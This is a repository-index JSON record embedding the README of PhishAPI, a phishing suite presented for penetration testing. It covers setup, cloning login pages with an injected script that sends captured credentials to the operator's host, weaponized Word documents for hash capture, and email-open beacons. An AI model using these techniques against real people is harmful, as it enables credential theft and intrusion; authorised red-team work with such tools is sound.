{"id":13843354,"url":"https://github.com/curtbraz/PhishAPI","last_synced_at":"2025-07-11T18:32:04.177Z","repository":{"id":50116056,"uuid":"111640844","full_name":"curtbraz/PhishAPI","owner":"curtbraz","description":"Comprehensive Web Based Phishing Suite for Rapid Deployment and Real-Time Alerting!","archived":false,"fork":false,"pushed_at":"2025-03-13T18:52:01.000Z","size":16742,"stargazers_count":377,"open_issues_count":0,"forks_count":86,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-06-28T23:07:08.334Z","etag":null,"topics":["cyberaware","cybersecurity","hacking","infosec","pentesting","phish","phishing","phishing-kit","security","socialengineering"],"latest_commit_sha":null,"homepage":"","language":"CSS","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/curtbraz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-11-22T05:37:29.000Z","updated_at":"2025-06-27T11:49:18.000Z","dependencies_parsed_at":"2022-08-26T12:32:59.413Z","dependency_job_id":"2f3f8e0c-f615-4f9c-af35-49bb3f42abf0","html_url":"https://github.com/curtbraz/PhishAPI","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/curtbraz/PhishAPI","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/curtbraz","download_url":"https://codeload.github.com/curtbraz/PhishAPI/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/curtbraz%2FPhishAPI/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264870394,"owners_count":23676221,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cyberaware","cybersecurity","hacking","infosec","pentesting","phish","phishing","phishing-kit","security","socialengineering"],"created_at":"2024-08-04T17:02:00.457Z","updated_at":"2025-07-11T18:32:04.165Z","avatar_url":"https://github.com/curtbraz.png","language":"CSS","funding_links":[],"categories":["PHP (184)","CSS"],"sub_categories":[],"readme":"# PhishAPI\r\n\r\n## Update: As of 3/13/2025 the Community Edition of PhishAPI is no longer supported. A major new release version is available for sale under a Commercial License that includes auto-provisioning of the API and landing pages, advanced analytics, as well as AI and auto-deployed emails. Please contact curtis@phishu.net if interested!\r\n\u003cbr\u003e\u003cbr\u003e\r\n\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/M6H7jfg.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eAuto-Generate Fake Portal\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/4TeVrzE.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eCreate Word Maldoc\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/fDwFbHy.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eWeaponize Existing Word Doc\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/xCMqAYc.gif\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eCreate or Leverage Saved Email Campaigns\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\r\n# To Setup (Ubuntu/Debian) :\r\n\r\n1) It's all in Docker now! Clone this repo (`git clone https://github.com/curtbraz/PhishAPI.git`), and `cd PhishAPI`. I typically host on an AWS EC2 Ubuntu instance or on WSL2 locally on Win 10 but you can host it anywhere. Be sure to open up ports TCP/80, 443, 445, \u0026 137-139 to the Internet.\r\n\r\n2) Install docker-compose on Ubuntu with `sudo apt-get install docker-compose -y` and start Docker with `sudo systemctl start docker`.\r\n\r\n3) For HTTPS (RECOMMENDED!), replace the certificate and key (keeping the filenames the same) in `/certs/ssl/` with yours (LetsEncrypt?) and update the domain (ServerName) in `000-default-le-ssl.conf`. Otherwise, skip this step but browsers will warn against POSTing to insecure sites and web push notifications won't work.\r\n\r\n4) Run docker-compose via `docker-compose build` from within the PhishAPI directory. Then, `docker-compose up -d`. (`docker-compose down` will kill it)\r\n\r\n5) Visit your URL and configure your settings for notifications first. The Default User/Pass for basic auth is PhishAPI:PhishAPI for the config and reporting pages but I recommend changing this by editing `.htpasswd`. You should be good to go! (By default the web server listens on HTTP/80 and HTTPS/443)\r\n\r\nOR, Copy and Paste the Following in Ubuntu: (skip the certbot and \"cp\" steps if you don't have a cert ready yet)\r\n\r\n\r\n```\r\nsudo apt-get update\r\nsudo apt-get install docker-compose letsencrypt git -y\r\ngit clone https://github.com/curtbraz/PhishAPI.git\r\ncd PhishAPI\r\n```\r\n\r\nSkip this step if you don't have your certs yet.\r\n\r\n```\r\ncertbot certonly --standalone\r\ncp `find /etc/letsencrypt/live/ -name cert.pem` certs/ssl/crt/phishapi.crt\r\ncp `find /etc/letsencrypt/live/ -name privkey.pem` certs/ssl/key/phishapi.key\r\n```\r\n\r\nThen\r\n\r\n```\r\nsudo systemctl start docker\r\nsudo docker-compose build\r\nsudo docker-compose up -d\r\n```\r\n\r\nFinally, if you only want to allowlist yourself while you obtain the certs (highly recommended), edit PhishAPI/html/index.php and change Line 31 to YOUR workstation's public IP address, not the IP of the server. Then comment out Line 32. Otherwise, leave it as-is and it will only block the denylist by default.\r\n\r\n# 1) To Use the API for Capturing Credentials from Fake Sites : \r\n\r\nRapid \u0026 Easy Deployment API for Phishing During Pentest Engagements.  Output to MySQL/Web Table \u0026amp; Slack Bot.  Supports BEEF Hooking \u0026 HaveIBeenPwned!\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/MKlHy2k.png\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 1: Choose \"Fake Portal\" From API Options\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/UfxzTHQ.png\" width=\"80%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 2: Choose a Pre-Designed Generic Portal for Landing Page\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/V9GOCZ9.png\" width=\"60%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 3: Fill Out API Details for Landing Page HTML and Optionally Include Your Own Logo\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/4MD7kq5.png\" width=\"70%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 4: Download Automatically Created Source HTML to Host on a Standalone Server\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/E7ZLcam.png\" width=\"90%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 5: The Hosted Site's Contents\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n## OR\r\n\r\n\u003cb\u003eIf you don't wish to use a pre-populated landing page template or one doesn't exist that you would like to use, feel free to create or clone your own.  Simply : \u003c/b\u003e\u003cbr\u003e\u003cbr\u003e\r\n\r\n1) Add the external script source in the `\u003chead\u003e` element\r\n\r\n\t`\u003cscript src=\"https://YOUR_PHISHAPI_URL.com/APICredentialFormSubmit.js\"\u003e\u003c/script\u003e`\r\n\r\n2) Change or add an \"onclick\" attribute to the submit button for the login form and fill out the arguments\r\n\r\n\t`\u003cbutton onclick=\"SubForm('PhishAPI_URL_HERE','NAME/ID_OF_LOGIN_FORM','PROJECT_NAME','SLACK_BOT_NAME','SLACK_EMOJI','USER_FIELD_NAME/ID','PASS_FIELD_NAME/ID','SOURCE_URL_HERE','CSRF_TOKEN_HERE')\"\u003eSubmit!\u003c/button\u003e`\r\n\t\r\n\tPhishAPI_URL_HERE = https://YOUR_PHISHAPI_URL.com (wherever you're hosting the API)\u003cbr /\u003e\r\n\tNAME/ID_OF_LOGIN_FORM = Whatever the cloned `\u003cform name=\"\"\u003e` is set to for the page you cloned\u003cbr /\u003e\r\n\tPROJECT_NAME = Self explanatory. The name of the org/client you're targeting (ex. Walmart)\u003cbr /\u003e\r\n\tSLACK_BOT_NAME = I use \"PhishBot\"\u003cbr /\u003e\r\n\tSLACK_EMOJI = I use `:fishing_pole_and_fish:`\u003cbr /\u003e\r\n\tUSER_FIELD_NAME/ID = Name or ID of the username/email field (ID Preferred) (`\u003cinput name=\"username\"\u003e` or `\u003cinput id=\"user\"\u003e`)\u003cbr /\u003e\r\n\tPASS_FIELD_NAME/ID = Name or ID of the password field (ID Preferred) (`\u003cinput name=\"password\"\u003e` or `\u003cinput id=\"pass\"\u003e`)\u003cbr /\u003e\r\n\tSOURCE_URL_HERE = Original Address You Cloned the Site From (ex. https://TARGET_URL.com/logon.html)\u003cbr /\u003e\r\n\tCSRF_TOKEN_HERE = Leave blank unless the site you're cloning has a CSRF token.  If so provide the Name/ID here (`\u003cinput type=\"hidden\" name=\"csrf_token\" value=\"XDLKJSDLKJLDKJDLKJFSLKLSF\"\u003e` so \"csrf_token\" is what you would use)\r\n\r\n4) Sit back and wait for the Slack bot to notify you.  When you want to see the credentials visit https://YOUR-API-HERE/results using your basic auth credentials or click the link in the Slack notification.\u003cbr\u003e\u003cbr\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/L8yYRMQ.png\" width=\"70%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 6: Someone Entered Credentials into the Fake Portal - Slack Alert\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/oXy9dEE.png\" width=\"80%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 7: BeEF Hook Slack Alert (Optional in Case You Want to React Quickly w/ Modules)\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/CcSw4TT.png\" width=\"100%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 8: Captured NTLMv2 Hash Exposed via Browser\u003c/b\u003e\r\n\u003cbr/\u003e\u003cbr/\u003e\u003c/p\u003e\r\n\r\n\u003cp align=\"center\"\u003e           \r\n\u003cimg src=\"https://i.imgur.com/xdeSaWC.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 9: Clicking the Slack Link Allows Viewing Credentials\u003c/b\u003e\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003c/p\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\r\n\r\n# 2) To Use the API for Generating Word Doc Payloads :\r\n\r\n1) Create `/var/www/uploads` Path and `sudo chmod 777 /var/www/uploads -R` the path\r\n\r\n3) Browse out to your hosted API (YOUR_URL.com) and select \"Weaponized Documents\" to generate your DOCX\r\n\r\n4) Optionally set up [Responder](https://github.com/SpiderLabs/Responder \"Responder\") in a background process and run `phishinghashes.sh` every minute or so with cron\r\n\r\n5) Set up your php.ini to allow uploads of at least 15MB and enable browscap.ini for parsing UserAgent strings, otherwise some functionality may be limited.  \r\n\r\n6) Email your doc and wait for the Slack alerts!\r\n\r\n\u003cp align=\"center\"\u003e\u003cb\u003eBonus points if you use your docs as honeypot bait! :)\u003c/b\u003e\u003c/p\u003e\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/LW4BUjN.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 1: Web Based Payload Generation - Create New Doc or Upload Existing w/ Payload Options\u003c/b\u003e\r\n\u003c/p\u003e\r\n                  \r\n            \r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/onsPyFp.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 2: Opening Document Generated (New) by Service\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/sw8JWQE.png\" width=\"40%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 3: If \"Auth Prompt\" is Selected in Payload Options, Display Basic Auth Prompt to User for Credential Capturing (like Phishery)\u003c/b\u003e\r\n\u003c/p\u003e\r\n                  \r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/HlY3T4G.png\" width=\"80%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 4: HTTP Beacon is Selected by Default and Alerts When the Target Opens the Document\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/ku6UTNI.png\" width=\"75%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 5: If Credentials are Entered from Figure 3 Above, Notify via Slack When Captured\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/OO0sjDR.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 6: Clicking on the Slack Alert Displays Captured Details (Hashes, Credentials, Client Details)\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/qZFGmXA.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 7: Slack Alert when UNC/SMB Hashes are Received from Word Document\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\n\u003cbr /\u003e\u003cbr/\u003e\r\n\u003cp align=\"center\"\u003e\r\n\t\u003cb\u003eCurrently, I'm running \u003ca href=\"https://github.com/SpiderLabs/Responder\"\u003eResponder\u003c/a\u003e in a Screen session with \u003ci\u003ephishinghashes.sh\u003c/i\u003e scheduled via Cron to run every minute to pick up hashes, correlate phished users, and alert via Slack.  You can also relay those hashes with another tool if you'd like to take things even further.  Enjoy! :)\u003c/b\u003e\u003c/p\u003e\r\n\r\n\r\n\r\n\r\n# 3) To Use the API to Store and Generate Email Campaign Templates : \r\n\r\nLeverage a template by creating or choosing an existing template from the local repository, or, you can compose a blank email and embed the invisible HTML beacon to be notified when the recipient opens their email.\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/AmwZbbF.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 1: Existing, New, or No Campaign Choices\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\nIf a new campaign is chosen, you can create variables for dynamic re-use in the future and store them as HTML templates in a database.  The WYSIWYG editor makes things simple, but you can also copy and paste from a text editor or another source if you'd like!\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/COHaq6q.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 2: New Campaign w/ Variables \u0026 Images\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\nNext time, choosing the existing template will dynamically provide input fields for the stored variables.  They can be applied in real time using JavaScript to update the email body.  Checking the \"Embed Notification for Opened Email\" box will automatically append invisible code to your template that will alert you when your recipient opens their email.  (Images must be allowed to render for this to work)\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/SsBAqKv.png\" width=\"75%\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 3: Existing Campaign\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\r\nSit back and watch as your target opens their email and cross your fingers you later recieve another alert for BeEF, Maldocs, or your captured credentials!\r\n\r\n\u003cbr /\u003e\r\n\u003cp align=\"center\"\u003e\r\n\u003cimg src=\"https://i.imgur.com/jJ5dGlRr.png\"\u003e\u003cbr /\u003e\r\n\u003cb\u003eFigure 4: Notification of Email Opened by Recipient\u003c/b\u003e\r\n\u003c/p\u003e\r\n\r\n\u003cb\u003eEnjoy! :)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcurtbraz%2FPhishAPI","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcurtbraz%2FPhishAPI","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcurtbraz%2FPhishAPI/lists"}